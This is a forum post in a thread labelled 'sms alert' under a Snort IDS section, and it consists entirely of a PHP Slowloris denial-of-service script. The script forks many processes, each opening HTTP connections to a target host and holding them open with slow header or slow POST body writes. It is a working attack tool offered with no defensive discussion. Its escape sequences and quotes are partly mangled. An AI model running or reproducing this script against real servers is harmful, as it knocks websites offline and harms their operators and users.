› Forums › Network Management › Snort IDS › sms alert
- This topic is empty.
-
AuthorPosts
-
August 5, 2012 at 6:31 am #43412
yat
Member#! /usr/bin/env php
/* PHP Slowloris
* Contains get based attack (slow headers) and post based attack (long content length)
*
* Author: Seppe vanden Broucke
*/function usage($argv){
print “Usage: ./{$argv[0]}[host]n”;
die();
}function attack_get($server, $host){
$request = “GET / HTTP/1.1rn”;
$request .= “Host: $hostrn”;
$request .= “User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)rn”;
$request .= “Keep-Alive: 900rn”;
$request .= “Content-Length: ” . rand(10000, 1000000) . “rn”;
$request .= “Accept: *.*rn”;
$request .= “X-a: ” . rand(1, 10000) . “rn”;$sockfd = @fsockopen($server, 80, $errno, $errstr);
@fwrite($sockfd, $request);while (true){
if (@fwrite($sockfd, “X-c:” . rand(1, 100000) . “rn”)){
echo “.”;
sleep(15);
}else{
echo “nOne get attack failed to sent…n”;
$sockfd = @fsockopen($server, 80, $errno, $errstr);
@fwrite($sockfd, $request);
}
}}
function attack_post($server, $host){
$request = “POST /”.md5(rand()).” HTTP/1.1rn”;
$request .= “Host: $hostrn”;
$request .= “User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)rn”;
$request .= “Keep-Alive: 900rn”;
$request .= “Content-Length: 1000000000rn”;
$request .= “Content-Type: application/x-www-form-urlencodedrn”;
$request .= “Accept: *.*rn”;$sockfd = @fsockopen($server, 80, $errno, $errstr);
@fwrite($sockfd, $request);while (true){
if (@fwrite($sockfd, “.”) !== FALSE){
echo “.”;
sleep(1);
}else{
echo “nOne post attack failed to sent…n”;
$sockfd = @fsockopen($server, 80, $errno, $errstr);
@fwrite($sockfd, $request);
}
}}
function main($argc, $argv){
$status = 1;if ($argc == 4){
$argv[4] = $argv[3];
}else if ($argc < 5){
usage($argv);
}$pids = array();
for ($i = 0; $i < $argv[2]; $i++){
$pid = pcntl_fork();if ($pid == -1){
die(“Error forking!n”);
}else if ($pid == 0){
//child process
if ($argv[1] == ‘post’) {
attack_post($argv[3], $argv[4]);
}elseif ($argv[1] == ‘get’) {
attack_get($argv[3], $argv[4]);
}else{
die(“Invalid method, use ‘get’ or ‘post’n”);
}
exit(0);
}else{
//parent process
$pids[] = $pid;
}
}foreach ($pids as $pid){
pcntl_waitpid($pid, $status);
}
}main($argc, $argv);
-
AuthorPosts
- You must be logged in to reply to this topic.